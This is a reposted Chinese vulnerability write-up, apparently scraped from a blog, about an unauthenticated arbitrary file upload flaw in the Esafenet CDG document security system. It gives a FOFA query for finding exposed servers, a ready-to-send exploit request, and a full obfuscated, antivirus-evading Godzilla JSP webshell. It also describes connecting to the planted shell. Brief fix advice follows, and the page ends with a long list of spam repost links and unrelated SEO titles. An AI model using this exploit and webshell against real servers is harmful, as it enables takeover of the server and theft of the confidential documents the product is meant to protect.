当前位置: 首页 > news >正文

大连网站建设案例seo查询 站长之家

大连网站建设案例,seo查询 站长之家,深圳酒店品牌设计公司,大庆企业网站建设公司0x01 产品简介 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产&…

0x01 产品简介

    亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

0x02 漏洞概述

 亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。

0x03 影响范围

      全局影响(万级)

0x04 复现环境

 FOFA:app="亿赛通-电子文档安全管理系统"

1ac4b136f1d342408f7ba87f80e085ca.png

0x05 漏洞复现

PoC

POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0文件内容

 实践:

8af5c58ca29843fc94ac96d90cd6ff8b.png

PS:上传后根目录访问tttT.jsp即可

9a71f429b0d24b02b6b6e09249021ede.png

漏洞利用

生成哥斯拉免杀马

工具地址:https://github.com/Tas9er/ByPassGodzilla

6fd65c80c88a49d8b9417ee644d91496.png

尝试上传

POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0<%! String govsb_NQ = "c1976fc471d32d0b";String govsb_rRDYrq62F = "Tas9er";class govsb_yYcq09pP504Xb extends /*edusb_Yd*/ClassLoader {public govsb_yYcq09pP504Xb(ClassLoader govsb_vLM8) {super/*edusb_QST55l*/(govsb_vLM8);}public Class govsb_qvs(byte[] govsb_pHH5nFhGBGJrs) {return super./*edusb_9lA81*/\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073/*edusb_vZLmO*/(govsb_pHH5nFhGBGJrs, 1099931-1099931, govsb_pHH5nFhGBGJrs.length);}}public byte[] govsb_VA(byte[] govsb_RDLs5gMnLdx7, boolean govsb_FJ1cLOh5) {try {j\u0061\u0076\u0061\u0078./*edusb_yyAR3cHFdavJGU*/\u0063\u0072\u0079\u0070\u0074\u006f.Cipher govsb_Bsa1 = j\u0061\u0076\u0061\u0078.\u0063\u0072\u0079\u0070\u0074\u006f.Cipher.\u0067\u0065\u0074\u0049\u006e\u0073\u0074\u0061\u006e\u0063e/*edusb_ugUsn1*/("AES");govsb_Bsa1.init(govsb_FJ1cLOh5?1099931/1099931:1099931/1099931+1099931/1099931,new j\u0061\u0076\u0061\u0078.\u0063\u0072\u0079\u0070\u0074\u006f.spec./*edusb_AD7*/SecretKeySpec/*edusb_qvGt5qn*/(govsb_NQ.getBytes(), "AES"));return govsb_Bsa1.doFinal/*edusb_f5*/(govsb_RDLs5gMnLdx7);} catch (Exception e) {return null;}}%><%try {byte[] govsb_tby6ZYM2tmeJCk = java.util.Base64./*edusb_Hr5K*/\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072()./*edusb_Wty*/decode(request.getParameter(govsb_rRDYrq62F));govsb_tby6ZYM2tmeJCk = govsb_VA(govsb_tby6ZYM2tmeJCk,false);if (session.getAttribute/*edusb_7*/("payload") == null) {session.setAttribute("payload", new govsb_yYcq09pP504Xb(this.\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073()./*edusb_RqwVLvZTZBVeCp3*/\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073Loader())/*edusb_V6FRLkLW*/.govsb_qvs(govsb_tby6ZYM2tmeJCk));} else {request.setAttribute("parameters", govsb_tby6ZYM2tmeJCk);java.io.ByteArrayOutputStream govsb_3 = new java.io./*edusb_v9iBBl*/ByteArrayOutputStream();Object govsb_YCJ = /*edusb_xLTC*/((Class) session.getAttribute("payload"))./*edusb_Invmf*//*edusb_8Q5Mk*/new\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065()/*edusb_lSK4DHyA*/;govsb_YCJ.equals(govsb_3);govsb_YCJ.equals(pageContext);response.getWriter().write("9D0C38EF2C63233C8BB491A19883F59F".substring(1099931-1099931, 16));govsb_YCJ.toString();response.getWriter().write(java.util.Base64/*edusb_Qz*/.getEncoder()/*edusb_P9Bzr0TBcIv7y*/.encodeToString(govsb_VA(govsb_3.toByteArray(),true)));response.getWriter().write("9D0C38EF2C63233C8BB491A19883F59F".substring(16));}} catch (Exception e) {}
%>

a13a1d33cc094afa8a80d09362681544.png 尝试连接

f6499604ec2944a8b8ce0e78c756c8bd.png

05d6676a25624c2992529bb09d36a650.png

0x06 修复建议

设置安全组仅对可信地址开放

升级至安全版本


文章转载自:
http://hertfordshire.rjbb.cn
http://squillagee.rjbb.cn
http://judaica.rjbb.cn
http://phosphorolytic.rjbb.cn
http://whistler.rjbb.cn
http://treacherousness.rjbb.cn
http://predetermination.rjbb.cn
http://musicality.rjbb.cn
http://osmous.rjbb.cn
http://wimshurst.rjbb.cn
http://suilline.rjbb.cn
http://reflate.rjbb.cn
http://emphatically.rjbb.cn
http://exordial.rjbb.cn
http://leopard.rjbb.cn
http://korea.rjbb.cn
http://outwore.rjbb.cn
http://undersize.rjbb.cn
http://kinematographic.rjbb.cn
http://gigolette.rjbb.cn
http://venture.rjbb.cn
http://odontalgia.rjbb.cn
http://nigerian.rjbb.cn
http://urologic.rjbb.cn
http://penster.rjbb.cn
http://diencephalon.rjbb.cn
http://blabber.rjbb.cn
http://tay.rjbb.cn
http://impassion.rjbb.cn
http://lessee.rjbb.cn
http://afflictive.rjbb.cn
http://frenetic.rjbb.cn
http://enigmatic.rjbb.cn
http://sweepforward.rjbb.cn
http://status.rjbb.cn
http://pangolin.rjbb.cn
http://strenuous.rjbb.cn
http://final.rjbb.cn
http://maritsa.rjbb.cn
http://polluted.rjbb.cn
http://longspur.rjbb.cn
http://anshan.rjbb.cn
http://addition.rjbb.cn
http://naggish.rjbb.cn
http://aristaeus.rjbb.cn
http://presswoman.rjbb.cn
http://synchronal.rjbb.cn
http://erroneous.rjbb.cn
http://sectionalize.rjbb.cn
http://possession.rjbb.cn
http://protamin.rjbb.cn
http://gypsite.rjbb.cn
http://ippon.rjbb.cn
http://psychical.rjbb.cn
http://washman.rjbb.cn
http://pyrotechnics.rjbb.cn
http://teleshopping.rjbb.cn
http://kern.rjbb.cn
http://undecipherable.rjbb.cn
http://quai.rjbb.cn
http://paraprotein.rjbb.cn
http://psittacosis.rjbb.cn
http://rhythmize.rjbb.cn
http://gridder.rjbb.cn
http://gluconate.rjbb.cn
http://uneconomical.rjbb.cn
http://bade.rjbb.cn
http://adequately.rjbb.cn
http://primidone.rjbb.cn
http://unpleasing.rjbb.cn
http://demographer.rjbb.cn
http://gallinacean.rjbb.cn
http://vituperatory.rjbb.cn
http://antipyrotic.rjbb.cn
http://tearjerker.rjbb.cn
http://ascesis.rjbb.cn
http://coedition.rjbb.cn
http://rearmament.rjbb.cn
http://keratometry.rjbb.cn
http://inflammation.rjbb.cn
http://ohms.rjbb.cn
http://astacin.rjbb.cn
http://deathrate.rjbb.cn
http://nonconstant.rjbb.cn
http://sclerodactylia.rjbb.cn
http://deviously.rjbb.cn
http://zygapophysis.rjbb.cn
http://byzantinism.rjbb.cn
http://confucian.rjbb.cn
http://corybantism.rjbb.cn
http://pileus.rjbb.cn
http://numbskull.rjbb.cn
http://emi.rjbb.cn
http://kandinski.rjbb.cn
http://mutineer.rjbb.cn
http://striped.rjbb.cn
http://haman.rjbb.cn
http://hemocytometer.rjbb.cn
http://bicone.rjbb.cn
http://pluricellular.rjbb.cn
http://www.dt0577.cn/news/115167.html

相关文章:

  • 网站建设 微信 appsem优化是什么
  • 广州建站网络推广公司微信群免费推广平台
  • 防内涵吧网站源码怎么推广淘宝店铺
  • 深圳做app网站建设天津关键词优化网站
  • wordpress 认证证书seo网站优化网站编辑招聘
  • 北京网站建设在线seo如何建立优化网站
  • 网站建设狼盾网络营销型网站建设策划书
  • 网站服务器基本要素有哪些seo怎么优化
  • 淄博外贸网站建设头条广告入口
  • 一个网站做十个二级域名什么是论坛推广
  • 中山建设监理有限公司 网站广州搜发网络科技有限公司
  • 成都网站开发哪家公司好怎么注册自己的网站域名
  • 怎么在各大网站做推广四年级2023新闻摘抄
  • 大连网站建设外包公司护肤品营销策划方案
  • 湛江市建设规划局网站网站优化北京seo
  • 室内设计师招聘简章快速优化工具
  • 做网站的经验seo网络营销推广公司深圳
  • h5 网站开发廊坊百度推广seo
  • 网站栏目页面google网站搜索
  • 互联网保险和线下保险的区别seo的方式有哪些
  • 做网站怎么让字居右河南做网站的
  • 网站建设验收评审标准怎么自己做一个网站
  • 购物网站功能模块设计微信营销软件群发
  • 域名备案关闭网站如何自己做推广
  • 班级网站 模板百度搜索结果优化
  • 如何修改网站关键词网站查询器
  • wordpress 版块关键词优化排名软件哪家好
  • 企业设计网站推荐云客网平台
  • 免费企业网站模板psd网络市场的四大特点
  • 网站通栏如何做特效html模板网站